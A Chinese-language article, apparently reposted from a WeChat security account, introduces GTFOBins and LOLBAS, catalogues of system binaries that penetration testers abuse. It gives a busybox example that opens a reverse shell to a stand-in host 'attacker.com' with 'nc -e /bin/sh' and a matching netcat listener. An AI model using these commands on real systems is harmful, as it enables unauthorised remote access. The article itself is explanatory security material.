GTFOBins(Living Off The Land Binaries)和LOLBAS(Living Off The Land Binaries and Scripts)是两个收集和记录各种系统二进制文件及其潜在利用方法的在线资源。它的主要目的是帮助安全研究人员和渗透测试人员在权限受限的情况下,通过利用系统上已有的合法工具进行权限提升、逃逸限制环境或执行其他操作。其中,GTFOBins专注于收集Unix/Linux系统的二进制文件, 而LOLBAS专注于收集Windows系统的二进制文件。
GTFOBins在线资源网址:https://gtfobins.github.io/
LOLBAS在线资源网址:https://lolbas-project.github.io/
其主要用途包括:
- 权限提升 - 利用系统上已有的二进制文件,通过特定命令或参数获得更高的权限。
- 逃逸限制环境 - 在受限制的环境(如受限的 shell 或容器)中,通过合法的二进制文件突破限制,获得更高的访问权限或逃逸到主机系统。
- 文件操作 - 使用二进制文件读取、写入、删除或移动文件,甚至在权限受限的情况下执行文件操作。
- 网络通信 - 利用二进制文件进行网络通信,包括数据传输、远程控制等。
- 命令执行 - 在目标系统上通过合法的二进制文件执行任意命令,从而达到特定的目的。
在网站中点击每个二进制文件链接, 都可以获取到以下详细信息:
- 详细的使用方法 - 每个二进制文件都有详细的使用说明,包括如何利用它们进行各种操作。
- 分类和标签 - 二进制文件按功能分类,并附有标签,方便用户查找特定用途的工具。
- 示例命令 - 提供具体的示例命令,展示如何利用这些二进制文件实现特定的攻击目标。
- 社区贡献 - GTFOBins 是一个开源项目,社区成员可以贡献新的发现和利用方法,不断丰富和更新资源库。
假如在渗透过程中, 想查找busybox有哪些利用方法,可以在网站的搜索框中搜索:busybox,如图:
在Functions中可以看到一些可利用的标签, 例如:
busybox可以用于通过生成交互式shell来突破受限环境:
busybox sh
也可以利用其获取反向shell,进行远程网络访问, 配置如下:
RHOST=attacker.com
RPORT=12345
busybox nc -e /bin/sh $RHOST $RPORT
之后在攻击者机器上运行以下命令接收shell:
nc -lvp 12345
要获取标签支持的功能信息查询, 只需要点击"busybox"链接即可查看支持的所有方法,如图:
LOLBAS的使用方法跟GTFOBins大致相似, 主要是针对Windows平台的系统默认Exe程序, 在这些收集的可执行文件中, 可以看到其存放路径、执行命令的参数、曾经被利用的相关资料, 如图:
在最下方还可以直接查看ATT&CK框架收集的攻击知识库, 如图:
原文始发于微信公众号(二进制空间安全):两个收集和记录系统二进制文件潜在利用方法的在线资源
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论